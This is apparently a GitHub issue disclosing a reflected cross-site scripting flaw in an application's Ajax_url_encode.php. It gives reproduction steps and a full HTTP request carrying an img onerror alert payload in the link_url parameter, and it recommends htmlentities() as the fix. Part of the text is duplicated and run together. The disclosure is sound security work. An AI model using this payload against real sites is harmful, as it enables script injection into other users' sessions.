You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Because of lacking of sanitizer of input data at $_REQUEST['link_url'] in Ajax_url_encode.php file, The Unauthenticated user can inject and execute javascript code on link_url parameter
Testing on local site:
Testing on demo site:
To Reproduce
XSS 1
Steps to reproduce the behavior:
Acess Ajax_url_encode.php file
Add ?link_url=[malicious script in here] behind Ajax_url_encode.php file
The backend will echo and execute malicious script
Request
GET /Ajax_url_encode.php?link_url=%3Cimg%20src=x%20onerror=alert(1);%3E HTTP/1.1
Host: 172.16.0.12:2222
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=mebdcag3g6jknfb8edrmee7ijp
Upgrade-Insecure-Requests: 1
Description:
Because of lacking of sanitizer of input data at
![image](https://user-images.githubusercontent.com/54875703/131649372-9f2c37d6-31e0-471e-b515-90d8410e6d43.png)
$_REQUEST['link_url']
inAjax_url_encode.php
file, The Unauthenticated user can inject and execute javascript code onlink_url
parameterTesting on local site:
![image](https://user-images.githubusercontent.com/54875703/131649432-7d5edb12-a593-4b77-9497-5ee890808d30.png)
Testing on demo site:
![image](https://user-images.githubusercontent.com/54875703/131649469-e857296c-cc7c-420d-97cd-6ab179cb8747.png)
To Reproduce
XSS 1
Steps to reproduce the behavior:
Ajax_url_encode.php
file?link_url=[malicious script in here]
behindAjax_url_encode.php
fileRequest
Response
Solution:
use
htmlentities()
function when echo the outputThe text was updated successfully, but these errors were encountered: